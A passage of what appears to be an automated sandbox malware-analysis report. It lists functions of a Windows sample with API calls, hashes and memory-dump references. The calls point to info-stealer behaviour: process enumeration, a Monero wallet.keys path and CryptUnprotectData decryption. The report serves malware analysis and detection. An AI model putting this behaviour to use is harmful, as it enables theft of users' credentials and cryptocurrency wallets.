                                • Opcode ID: a0ff0887a2a3a3c00ccbd769daff7d04a978f0eaa94cb8540455a6d1de0d2f2c
                                • Instruction ID: ac303c75b6338351feca24916d532b56eb5f5d36d3211b373ff0782f4ab033a4
                                • Opcode Fuzzy Hash: a0ff0887a2a3a3c00ccbd769daff7d04a978f0eaa94cb8540455a6d1de0d2f2c
                                • Instruction Fuzzy Hash: 7BB2F6F360C2009FE3046E29EC8567AFBE6EFD4720F1A893DE6C487744EA3559058697
                                Function 00ED8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00EE05B7), ref: 00ED86CA
                                • Process32First.KERNEL32(?,00000128), ref: 00ED86DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00ED86F3
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • CloseHandle.KERNEL32(?), ref: 00ED8761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 50e09dcdf99f9911258bf66980351c293388fcd6e84de577f4d2d4a532e42f37
                                • Instruction ID: 3cffa5143db88a72889eb7ee19f1da0149e138b355601ddf7f30c84e44249211
                                • Opcode Fuzzy Hash: 50e09dcdf99f9911258bf66980351c293388fcd6e84de577f4d2d4a532e42f37
                                • Instruction Fuzzy Hash: 70315971901258ABCB29DF51DC55FEEB7B8EF44700F1041AAB50AB2290DB706B86CFA1
                                Function 00ED8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00EC5184,40000001,00000000,00000000,?,00EC5184), ref: 00ED8EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 7c1cfab1a4227254558c828736f56c21e5f594c6d645e725aecd44a6c75f6cbc
                                • Instruction ID: c34a518d7062d05fc6c5d07a17cd2c98fcc940a1db4679dea9fa724ad670a13d
                                • Opcode Fuzzy Hash: 7c1cfab1a4227254558c828736f56c21e5f594c6d645e725aecd44a6c75f6cbc
                                • Instruction Fuzzy Hash: 7611F874600208BFDB04CF64E984FA633AAEF89304F10A559F9299B340DB75E982DB60
                                Function 00ED7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EE0E00,00000000,?), ref: 00ED79B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED79B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00EE0E00,00000000,?), ref: 00ED79C4
                                • wsprintfA.USER32 ref: 00ED79F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 113284afd500bdcb37418d92ba939f8a9e4e671030505ee2e18c53b44aa7fa9c
                                • Instruction ID: 9c6430193019e79092253c34bcea7f8e2c5b2638c4ba2fe9fb447bd41a856e93
                                • Opcode Fuzzy Hash: 113284afd500bdcb37418d92ba939f8a9e4e671030505ee2e18c53b44aa7fa9c
                                • Instruction Fuzzy Hash: 2C112AB2944218ABCB14DFD9ED45BBEB7F8FB4CB12F10411AF655A2284E2795940C7B0
                                Function 00ED7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00DADE90,00000000,?,00EE0E10,00000000,?,00000000,00000000), ref: 00ED7A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00DADE90,00000000,?,00EE0E10,00000000,?,00000000,00000000,?), ref: 00ED7A7D
                                • wsprintfA.USER32 ref: 00ED7AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 94a84f2ff79129fbe6f4a9e2b7ab1ee46f1ffadb76bb21149a17e70319e63a58
                                • Instruction ID: 8c4dc444db1fcb010948fca9d1e51fbc6a63f995d3acc0e45d4ef4f40a3b51f8
                                • Opcode Fuzzy Hash: 94a84f2ff79129fbe6f4a9e2b7ab1ee46f1ffadb76bb21149a17e70319e63a58
                                • Instruction Fuzzy Hash: A4113CB1E45218EBEB248B54DC49FA9B778FB44721F1042AAE91AA3280D7745A81CB51
                                Function 01282ABA Relevance: 5.3, Strings: 3, Instructions: 1561COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ?^{$N_;$\@w.
                                • API String ID: 0-1084285239
                                • Opcode ID: b263eb7f3c7ad23bff63918c02da13f1e27edaa09574f30533bb1c4ae2df81bd
                                • Instruction ID: 351e3cb79015f7456d798467f4562148507fbf5c9f853368778644d925135f5f
                                • Opcode Fuzzy Hash: b263eb7f3c7ad23bff63918c02da13f1e27edaa09574f30533bb1c4ae2df81bd
                                • Instruction Fuzzy Hash: 49B227F360C2049FE304AE2DEC8577AB7E9EF94320F1A493DEAC583744EA3558058697
                                Function 00ED3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00EDE118,00000000,00000001,00EDE108,00000000), ref: 00ED3758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00ED37B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: ee3dbc931606177f290133f550e284453de3f0735e773c3d1d988fc295c370e1
                                • Instruction ID: 3a5a858a3c8598385ae9368f0ee89dead2a36963bef1c2a124236c8cd4695b99
                                • Opcode Fuzzy Hash: ee3dbc931606177f290133f550e284453de3f0735e773c3d1d988fc295c370e1
                                • Instruction Fuzzy Hash: 76410974A00A189FDB24DB58CC84B9BB7B5FB48302F4051D9E608AB2D0D7B16EC6CF50
                                Function 00EC9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EC9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EC9BA3
                                • LocalFree.KERNEL32(?), ref: 00EC9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: e9a0c118ff88c69c7321eebc7f3ba4561577ba823dc13d1efeb35b70d351957d
                                • Instruction ID: fd7b2df6c1467991c32d1210cec98d0763fc5491fafe22a3e18387370decad7a
                                • Opcode Fuzzy Hash: e9a0c118ff88c69c7321eebc7f3ba4561577ba823dc13d1efeb35b70d351957d
                                • Instruction Fuzzy Hash: A011FAB8A00209EFDB05DF94D985EAE77B5FF88300F104568E815A7340D775AE51CF61
                                Function 0128E750 Relevance: 4.1, Strings: 2, Instructions: 1580COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: v1<k$${>
                                • API String ID: 0-740598145
                                • Opcode ID: a12f50e3f1cb09e0b02a4356b9ce3babf66fd41b19f16aae10022056f59050b7
                                • Instruction ID: aa34cd71c13873db0128d7d7e6db4febe0ca32069b2906d997a7dc9d463d2f2a
                                • Opcode Fuzzy Hash: a12f50e3f1cb09e0b02a4356b9ce3babf66fd41b19f16aae10022056f59050b7
                                • Instruction Fuzzy Hash: DCB2F6F3A0C2009FE3046E2DEC8567ABBE9EF94720F16893DE6C4C7744EA3558158697
                                Function 012887E4 Relevance: 3.0, Strings: 2, Instructions: 532COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 9Bv>$=Bv>
                                • API String ID: 0-1139873718
                                • Opcode ID: a8ba4e19c610e68730816ed631e382bc35127926d75e916442e76aaf382add9e
                                • Instruction ID: 918045b5524c2d36a64f54247ac4a8f20d58d86efd99079769b323ff4ff12940
                                • Opcode Fuzzy Hash: a8ba4e19c610e68730816ed631e382bc35127926d75e916442e76aaf382add9e
                                • Instruction Fuzzy Hash: DBF106F3A0C2049FD3186E2DEC45A7ABBE6EFD4320F1A4A3DEAC4C3744E53558158696
                                Function 01285F31 Relevance: 2.9, Strings: 1, Instructions: 1636COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: }<y
                                • API String ID: 0-761022994
                                • Opcode ID: a3a8e6e97b508bcb97c2cde21bca794d46f55c784868fb441b912604a50d58fb
                                • Instruction ID: 34e90ca453e57f8bf3cb2f715749094e14daaab03c405e906db1dcd1cf6583d7
                                • Opcode Fuzzy Hash: a3a8e6e97b508bcb97c2cde21bca794d46f55c784868fb441b912604a50d58fb
                                • Instruction Fuzzy Hash: 64B208F36082009FE304AE2DEC8567ABBE6EFD4720F1A893DE6C5C3744E63598458657
                                Function 01294309 Relevance: 1.8, Strings: 1, Instructions: 542COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: o?
                                • API String ID: 0-967569042
                                • Opcode ID: e8c7c303f56f2b18b19ce4d8a386ed002f0fd6d99f39074add4370839264898e
                                • Instruction ID: 73927f7c740db61194a60b80dcd29f19987d5a406f9783e807b3a2a068fe91c5
                                • Opcode Fuzzy Hash: e8c7c303f56f2b18b19ce4d8a386ed002f0fd6d99f39074add4370839264898e
                                • Instruction Fuzzy Hash: B502E4F390C6049FE3046E2DEC8167AFBE5EF94720F16492DEAC583344EA75A8118697
